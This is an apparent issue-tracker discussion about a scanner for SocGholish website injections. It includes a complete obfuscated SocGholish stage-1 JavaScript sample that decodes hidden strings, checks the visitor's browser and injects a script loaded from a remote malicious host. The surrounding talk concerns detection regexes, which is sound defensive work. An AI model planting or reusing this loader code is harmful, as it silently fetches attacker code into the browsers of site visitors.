Different iteration

[joshnck]

I found a different iteration of SocGholish in the wild that uses a %2 function to deobfuscate itself rather than the Base64 method you are identifying:

(function () { var oi = document.referrer; var fb = window.location.href; var gy = navigator.userAgent; var sq = new RegExp(bz('l:b/x/x(t[v^b/z]i+d)c/t')); if (!oi || fb.match(sq)[1] == oi.match(sq)[1] || gy.indexOf(bz('rWrienudoolwisj')) == -1 || window.localStorage[bz('z_q_w_tuutqmhai')]) { return; } var cx = bz('fsycdrkizpqtt'); var fe = document.createElement(cx); fe.async = true; fe.src = bz('ahststqpqsk:s/z/kakucchtjirosnx.fwqofnwdlewrlwrobmdacntqpuniglftksu.pcmonmo/yrheapsosrktv?wrn=pdejs1miiZojuctzdNizogkxtMqjoUj1jNp2jYtxgNajpgxznMyDyIv2jMvyaZojvaxWzQa9qMgjvYd5i'); var sg = document.getElementsByTagName(cx)[0]; sg.parentNode.insertBefore(fe, sg); function bz(ft) { var sw = ''; for (var vn = 0; vn < ft.length; vn++) { if (vn % 2) { sw += ft[vn]; } } return sw; }a }());

As such, this would go undetected with your scanner :)

[lasq88]

Thanks. Scanner is actually trying to match both base64 obfuscated strings as well as %2 obfuscated strings, it also has 2 regex that should match injected code no matter the obfuscation routine. If you look at screenshot provided in a readme file it actually references a sample obfuscated with %2 obfuscation.

I checked and the code provided by you should match 1 out of 3 indicators (to be precise it matches .W.i.n.d.o.w.s. regex). It's still an interesting sample, as it wouldn't match too more generic regexes due to some different formating of the code. I will fix this, thank you!

[joshnck]

You are right - and I tested this against a domain I know is infected and I was able to detect the stage1. Unfortunately the stage2 is down and I wasn't able to go further.

An additional feature that would be nice is a verbose mode!